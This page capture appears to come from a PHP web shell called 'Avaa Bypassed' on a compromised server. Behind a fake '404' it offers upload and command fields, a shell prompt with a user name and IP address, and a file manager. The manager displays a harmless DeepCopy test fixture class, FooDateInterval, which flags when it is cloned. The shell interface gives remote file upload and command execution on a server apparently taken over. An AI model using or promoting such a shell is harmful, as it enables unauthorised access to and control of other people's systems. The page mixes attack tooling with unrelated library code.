404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.116.85.96: ~ $
<?php declare(strict_types=1);

namespace DeepCopy\f007;

use DateInterval;

class FooDateInterval extends DateInterval
{
    public $cloned = false;

    public function __clone()
    {
        $this->cloned = true;
    }
}

Filemanager

Name Type Size Permission Actions
FooDateInterval.php File 240 B 0644
FooDateTimeZone.php File 240 B 0644